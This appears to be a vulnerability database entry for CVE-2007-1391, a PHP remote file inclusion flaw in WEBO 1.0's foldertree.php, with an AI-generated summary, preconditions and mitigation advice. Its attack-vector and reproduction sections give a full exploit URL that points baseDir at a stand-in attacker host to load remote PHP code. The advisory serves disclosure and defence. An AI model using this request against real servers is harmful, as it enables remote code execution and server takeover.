CVE-2007-1391
Description
PHP remote file inclusion in WEBO (weborganizer) 1.0 allows arbitrary code execution via the baseDir parameter in modules/abook/foldertree.php.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
PHP remote file inclusion in WEBO (weborganizer) 1.0 allows arbitrary code execution via the baseDir parameter in modules/abook/foldertree.php.
Vulnerability
PHP remote file inclusion vulnerability exists in modules/abook/foldertree.php of Leo West WEBO (aka weborganizer) version 1.0. The script unsafely uses the baseDir parameter supplied via a URL, allowing an attacker to include a remote file containing arbitrary PHP code [1].
Exploitation
The attacker needs only the ability to send an HTTP GET request to the vulnerable script. By providing a crafted URL in the baseDir parameter pointing to an external server hosting a malicious PHP payload, the file is included and executed. No authentication is required [1].
Impact
Successful exploitation results in remote code execution with the privileges of the web server. The attacker can execute arbitrary PHP commands, potentially gaining full control over the affected application and server [1].
Mitigation
No official patch or updated version has been released for this software. The application appears to be unmaintained or abandoned. As a workaround, if the file is not needed, remove or restrict access to modules/abook/foldertree.php, or disable the vulnerable functionality. This vulnerability is not listed on CISA's Known Exploited Vulnerabilities catalog [1].
AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input sanitization on the $baseDir variable in an include_once() call allows remote file inclusion."
Attack vector
An attacker sends a crafted HTTP GET request to `modules/abook/foldertree.php` with the `baseDir` parameter set to a URL pointing to an attacker-controlled PHP script, e.g. `http://attacker.com/evil?` [ref_id=1]. When PHP's `register_globals` and `allow_url_fopen` are both enabled, the unsanitized `$baseDir` value is passed directly into `include_once()`, causing the remote file to be included and executed [ref_id=1].
Affected code
The vulnerable file is `modules/abook/foldertree.php` in WEBO (Web Organizer) 1.0. The file includes `"$baseDir/lib/HTML/tree.php"` without sanitizing the `$baseDir` variable [ref_id=1].
What the fix does
The advisory recommends sanitizing the `$baseDir` variable before it is used in the include statement, and turning off `register_globals` [ref_id=1]. No official patch is shown in the bundle; the remediation guidance is to properly validate or restrict the `$baseDir` input and disable dangerous PHP configuration options.
Preconditions
- configPHP register_globals must be enabled
- configPHP allow_url_fopen must be enabled
- networkAttacker must be able to send HTTP requests to the target server
- inputThe baseDir parameter is user-controllable via GET request
Reproduction
Visit `http://www.target.com/[webo_path]/modules/abook/foldertree.php?baseDir=http://attacker.com/evil?` where the attacker's server hosts a malicious PHP script [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
6News mentions
0No linked articles in our index yet.